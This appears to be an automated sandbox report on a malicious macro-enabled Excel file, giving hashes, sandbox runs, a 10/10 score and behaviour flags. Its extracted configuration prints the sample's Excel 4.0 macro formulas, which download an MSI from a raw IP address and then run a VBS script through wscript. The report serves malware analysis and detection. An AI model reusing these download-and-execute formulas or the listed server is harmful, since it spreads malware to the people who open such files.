General
-
Target
988fc5f2dbed5e8cc076a26d623b7bbb
-
Size
6KB
-
Sample
231222-qcsseadhdl
-
MD5
988fc5f2dbed5e8cc076a26d623b7bbb
-
SHA1
86fc71d38e25b4ffc697fdb2c1e561b5948a04bb
-
SHA256
d3acc23f8f1b2a3ec0944f0f83477187cba2c18f22e3b5c28b29ea1c7dfc134a
-
SHA512
0d26fdd74830bdb97666523212f059ba34cd4e20acd34ae65a264a27f34d167737b48319eab1a92f78efa4dbd507901f892dd68528a9465c1e9f0a7e91f36ff8
-
SSDEEP
192:NDSiuSwbrA2OmmfRD8UhHFBFYulb98yl6+Pm:NVuNM2wx1FYwb98ylvm
Static task
static1
Behavioral task
behavioral1
Sample
988fc5f2dbed5e8cc076a26d623b7bbb.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
988fc5f2dbed5e8cc076a26d623b7bbb.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
988fc5f2dbed5e8cc076a26d623b7bbb
-
Size
6KB
-
MD5
988fc5f2dbed5e8cc076a26d623b7bbb
-
SHA1
86fc71d38e25b4ffc697fdb2c1e561b5948a04bb
-
SHA256
d3acc23f8f1b2a3ec0944f0f83477187cba2c18f22e3b5c28b29ea1c7dfc134a
-
SHA512
0d26fdd74830bdb97666523212f059ba34cd4e20acd34ae65a264a27f34d167737b48319eab1a92f78efa4dbd507901f892dd68528a9465c1e9f0a7e91f36ff8
-
SSDEEP
192:NDSiuSwbrA2OmmfRD8UhHFBFYulb98yl6+Pm:NVuNM2wx1FYwb98ylvm
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-